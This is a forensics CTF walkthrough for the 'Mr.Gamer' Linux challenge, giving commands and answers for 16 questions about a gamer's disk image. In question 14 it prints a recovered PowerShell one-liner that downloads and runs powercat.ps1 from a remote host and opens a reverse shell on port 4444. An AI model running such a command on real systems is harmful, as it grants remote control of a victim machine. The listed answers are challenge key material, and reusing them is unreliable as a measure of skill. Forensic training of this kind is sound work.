This Linux image belongs to a user who likes to play video games, especially Minecraft, and communicates with friends. But is this user doing something they shouldn't be? We need to identify any anomaly behavior done by this user. Use your Linux forensics skills to solve the challenge!
Information
Category Name: Mr.Gamer
Files :Â c77-linux.zip 14.55 GB
â â2022 CTF â Linux.7zâ 14.55 GB
Since the file is large, I recommend either sharing a folder with your VM or using an external drive.
Â
My Recommendations
Download it from CyberDefenders and verify the file with sha1sum:
sha1sum /path/to/c77-linux.zip
SHA1: 62aa7c7d4fcd3f442365b1d7aa6b12a77e244627
This is my personal preference, I like being organized and deleting a folder when Iâm done with it .
mkdir Documents/CyberDefenders/Gamer && cd Documents/CyberDefenders/Gamer
sudo ewfmount /path/to/LenovoFinal.E01 /mnt/ewf sudo mount -o ro,noload,offset=537919488 /mnt/ewf/ewf1 /mnt/Linux
Â
Walkthrough
1: What is the name of the utility/library the user was looking at exploits for?
The question asks what the user is looking for, so we can take a look at Browser History:
sudo find /mnt/Linux -name "places.sqlite" -o -name "History"
Which returns two places.sqlite databases, one for firefox, one for ThunderBird:
We can copy both, although Iâm sure the information is in the Firefox history:
cp /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/places.sqlite thunderbird-places.sqlite
cp /mnt/Linux/home/rafael/snap/firefox/common/.mozilla/firefox/mcrcm1xn.default/places.sqlite ff-places.sqlite
sqlite browser ff-places.sqlite
In the table moz_places, we can filter the url for google.com/search?. We will see that lots of hacking/exploit stuff was searched, but the user specifically looked for log4j exploits:
Answer: log4j
2: What is the version ID number of the operating system on the machine?
Looking at /etc/issue:
cat /mnt/Linux/etc/issue
Answer: 21.10
3: What is the hostname of the computer?
We can find this information in /etc/hosts:
cat /mnt/Linux/etc/hosts
Â
Â
Answer:Â rshell-lenovo
4: What is one anime that the user likes?
The Question Title is A little blue birdie told me, so obviously it refers to Twitter. We can grep for both strings in Rafaelâs directory to identify potential files.
grep -r -i 'anime' /mnt/Linux/home/rafael | grep -i twitter
All the links in the Inbox are basically the same, for a status of Anime account. Now, grepping for the exact link:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -F 'https://twitter.com/AnimeShots___/status/148959235968=' -B 10 -A 10
To validate this, we can grep for âAttack On Titanâ:
grep -r -s -l -F 'Attack On Titan' /mnt/Linux
Outside the thunderbird directory, there is a match at ânotificationstore.jsonâ in Firefox:
The fact that rafael received a notification for this topic pretty much confirms his luuuv for Attack On Titan.
Answer: Attack on Titan
5: What is the UUID for the attacker's Minecraft account?
There is .minecraft folder in the userâs directory. The playerâs information can be found in usercache.json:
jq . /mnt/Linux/home/rafael/.minecraft/usercache.json
Answer: 8b0dec19-b463-477e-9548-eef20c861492
6: What VPN client did the user install and use on the machine?
Looking at the dpkg.log, zerotier-one was installed on the machine:
cat /mnt/Linux/var/log/dpkg.log | grep -F 'status installed' | sed 's/^.*status installed //g' | sort | uniq
On top of that, Firefox History shows that the user searched for ZeroTier, Downloaded it and Signed in :
Answer: zerotier
7: What was the user's first password for the guest wifi?
Usually, a guest password is sent over email.
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -i guest -B 5 -A 5
The guest wifi is ChamplainGuest, and this is the âtemplateâ email of when they send the credentials.
To find the first password, we need to find the oldest expiry date:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -i guest -B 5 -A 5 | grep -F 'Account expires'
The oldest date is Friday, January 28, 2022 17:01, we just need to search for that:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -F 'Friday, January 28, 2022 17:01' -B 10
Answer: 093483
8: The user watched a video that premiered on Dec 11th, 2021. How many views did it have when they watched it on February 9th?
In the Firefox places.sqlite database, I am using this SQL query to find the youtube url watched on February 9th:
select
moz_places.id as 'Id',
moz_places.url,
moz_places.title,
moz_places.description,
datetime(moz_historyvisits.visit_date/1000000,'unixepoch','localtime' ) as 'VisitDate'
FROM moz_places
left join moz_historyvisits on moz_historyvisits.place_id = moz_places.id
order by VisitDate desc
Then saving it as a View, and filtering the urls for youtube and the VisitDate for â2022-02-09â:
Â
We can copy the links to a Browser and see Youtubeâs information. Id 176 premiered on December 11th 2021. There is nothing in the wayback machine, but in Rafaelâs Pictures directory there are three screenshots dated February 9th.
Looking at the three screenshots shows two different view counts. At 17:42 and 17:31 it had 265,355 views.
Â
At 16:42 it had 265,342 views:
Â
Itâs unclear which value to submit, but the correct answer is for the 16:42 screenshot.
Answer: 265342
9: What is the new channel name for the YouTuber whose cookbook is shown on the device?
In rafaelâs User directory, there is a folder named âmarshalsecâ which contains the all things related to the log4j exploit. The folder poc contains screenshots, we can bulk open them by doing:
find /mnt/Linux/home/rafael -name "*.jpeg" -exec display "{}" \;
The file aaGkBJdu.jpeg contains a screenshot (?) with a cookbook for Binging with Babish:
Searching for it in Youtube, shows the challen name is Babish Culinary Universe:
Answer: Babish Culinary Universe
10: What is the module with the highest installed version for the chat application with the mascot Wumpus?
The chat application in question is Discord. We can check its directory to identify potential files:
ls -la /mnt/Linux/home/rafael/.config/discord
The first directory, 0.0.16, is the âversionâ directory, and it contains a file named âinstalled.jsonâ which we can check for installation information:
jq . /mnt/Linux/home/rafael/.config/discord/0.0.16/modules/installed.json
The highest installed version is for the discord_voice module:
Answer: discord_voice
11: According to Windows, what was the temperature in Fahrenheit on February 11th, 2022, at 6:30 PM?
This question is related to the screenshots in the marshalsec/poc directory. Now, itâs obvious that these screenshots were taken on the Victimâs machine. Using the same command as before to bulk open the images:
find /mnt/Linux/home/rafael -name "*.jpeg" -exec display "{}" \;
The file marshalsec/poc/YXvySdGd.jpeg matches the timestamp:
The temperature was 45 ÂșF.
Answer: 45F
12: What is the upload date of the second youtube video on the channel from which the user downloaded a youtube video?
Looking at the Downloads directory, there is a .wav file:
ls -la /mnt/Linux/home/rafael/Downloads
We can use exiftool to find out from where it was downloaded:
exiftool /mnt/Linux/home/rafael/Downloads/'Rick Astley - Never Gonna Give You Up (Official Music Video).wav'
Opening the link in a browser, and looking at Rick Astleyâs upload history, the second video was âWhenever You Need Somebodyâ :
Which was uploaded on October 25th, 2009:
Answer: 10/25/2009
Â
13. What is the SHA-1 hash of Minecraft's "latest" release according to the system?
This question literally took me YEARS to solve. In the .minecraft/versions directory there is a file named âversion_manifest_v2.jsonâ
jq . /mnt/Linux/home/rafael/.minecraft/versions/version_manifest_v2.json
The first element shows the latest release as â1.18.1â and the snapshot as â22w06aâ:
For some reason I was convinced that the hashes in the file were irrelevant, as they were hashes to json files and not the actual âexecutable/releaseâ. So I spent lots of time looking up and trying all sorts of hashes related to this specific version. However, the correct answer was right under my eyes đđ.
Answer: 3c6e119c0ff307accf31b596f9cd47ffa2ec6305
14: What were the three flags and their values that were passed to powercat? The answer must be provided in the same format as the entered command. (For example, if the command was "powercat -D Y -l a -n," the answer would be "-D Y -l a -n")
In the marshalsec/poc/ there is a powercat.ps1 file, however no real evidence of execution exists. We can grep the entire partition for the filename:
sudo grep -r -s -l -F 'powercat.ps1' /mnt/Linux
#returns /mnt/Linux/swapfile and /mnt/Linux/home/rafael/.bash_history
strings /mnt/Linux/home/rafael/.bash_history | grep powercat -B 5 -A 5
The bash history shows only evidence of the script being Downloaded:
We can check the swapfile:
sudo strings -a -td -el /mnt/Linux/swapfile | grep 'powercat' -B 5 -A 5
and here is the full command:
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.191.253:8000/powercat.ps1');powercat -c 192.168.191.253 -p 4444 -e cmd"
Answer: -c 192.168.191.253 -p 4444 -e cmd
15: How many dimensions (including the overworld) did the player travel to in the "oldest of the worlds"?
Another question I spent hours on since I know nothing about Minecraft đ.
The three âdimensionsâ in minecraft are the Overworld, the Nether, and the End. First, letâs identify the âoldest of the worldsâ. The âworldsâ of the players are saved under âsavesâ:
ls -la /mnt/Linux/home/rafael/.minecraft/saves
So the âworldâ is âNew Worldâ. Then, I did everything possible. I extracted the .mca files, parsed the .dat files but nothing. So I used the hints which pointed to the âadvancementsâ. The directory contains only one file: 8b0dec19-b463-477e-9548-eef20c861492.json. A little google took me here.
Essentially, if the user traveled to the end or the nether, the advancement would start with âminecraft:netherâ or âminecraft:endâ. So we can check the json file for minecraft and see the list of advancements:
jq . /mnt/Linux/home/rafael/.minecraft/saves/'New World'/advancements/8b0dec19-b463-477e-9548-eef20c861492.json | grep minecraft -B 1
None of these are âendâ or ânetherâ, so the user must have stayed in the Overworld.
Answer: one
16: What is the mojangClientToken stored in the Keystore?
This one took time, but actually, given that the key (Matrix_1999) is provided it was way easier than I thought.
First, letâs find the keystore:
sudo find /mnt/Linux -name "*.keystore"
#returns /mnt/Linux/home/rafael/.local/share/keyrings/user.keystore
Then, I copied rafaelâs keystore to my keyrings directory and change its name:
cp /mnt/Linux/home/rafael/.local/share/keyrings/user.keystore /home/remnux/.local/share/keyrings/rafael.keystore
I then opened the âPasswords and Keysâ app on my machine. A new âLoginâ tab was there, so I unlocked it with the password Matrix_1999:
Double clicked on the mojangClientToken, and selected copy (the password is hidden) and pasted it in Terminal to get its value, which is 2f76c8b04c004ddd888a05a6cad6be52.
Answer: 2f76c8b04c004ddd888a05a6cad6be52
TLDR
Just a boy playing around with Log4j
